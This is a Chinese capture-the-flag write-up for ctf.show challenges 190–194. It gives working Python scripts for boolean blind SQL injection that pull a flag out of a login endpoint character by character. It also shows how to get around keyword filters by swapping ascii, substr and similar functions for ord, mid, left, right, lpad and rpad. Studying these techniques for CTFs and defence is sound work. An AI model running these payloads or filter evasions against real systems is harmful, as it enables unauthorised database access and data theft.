布尔盲注web入门190-194

基础脚本

import requests
url = 'http://9980403b-660a-4aa7-90a0-c791e0e00ca6.challenge.ctf.show/api/index.php'
result = ''
i = 0
while True:
    i = i + 1
    low = 32
    high = 127
    while low < high:
        mid = (low + high) // 2
        data = {
            "username": f"admin' and if(ascii(substr((select group_concat(f1ag)from ctfshow_fl0g),{i},1))>{mid},1,0)#",
            "password": "1"
        }
        r = requests.post(url, data=data).text

        if '\\u5bc6\\u7801\\u9519\\u8bef' in r:
            low = mid + 1
        else:
            high = mid
    if low != 32:
        result += chr(low)
    else:
        break
    print(result)

过滤1:

if(preg_match('/file|into|ascii/i', $username)){

绕过姿势:使用ord代替ascii

data = {
            "username": f"admin' and if(ord(substr((select group_concat(f1ag)from ctfshow_fl0g),{i},1))>{mid},1,0)#",

            "password": "1"
        }

过滤2:

if(preg_match('/file|into|ascii|ord|hex/i', $username)){

绕过姿势:使用字典直接对比是否正确

import requests
 
url = "http://128f6cc0-3428-4086-8f43-384bac13bae8.challenge.ctf.show/api/index.php"
out = ''
dic = '{-}0123456789abcdefghijklmnopqrstuvwxyz'
for j in range(1, 50):
    for k in dic:
        data = {
            'username': f"0'||if(substr((select group_concat(f1ag)from ctfshow_fl0g),{j},1)='{k}',1,0)#",
            'password': '1'
        }
        re = requests.post(url, data=data)
        if("\\u5bc6\\u7801\\u9519\\u8bef" in re.text):
            out += k
            print(out)
            break

这种方式前两种也可以直接出来,但是会慢一点
过滤3:

if(preg_match('/file|into|ascii|ord|hex|substr/i', $username)){

绕过姿势:使用 mid 代替新增过滤 substr,也可以用left和right

data = {
            'username': f"0'||if(mid((select group_concat(f1ag)from ctfshow_flxg),{j},1)='{k}',1,0)#",
            'password': '1'
        }

这里的库名改了
过滤4:

if(preg_match('/file|into|ascii|ord|hex|substr|char|left|right|substring/i', $username)){

绕过姿势:lpad 和 rpad 也可以和上一个一样用mid

posted @ 2024-12-07 16:45  Govced  阅读(2)  评论(0编辑  收藏  举报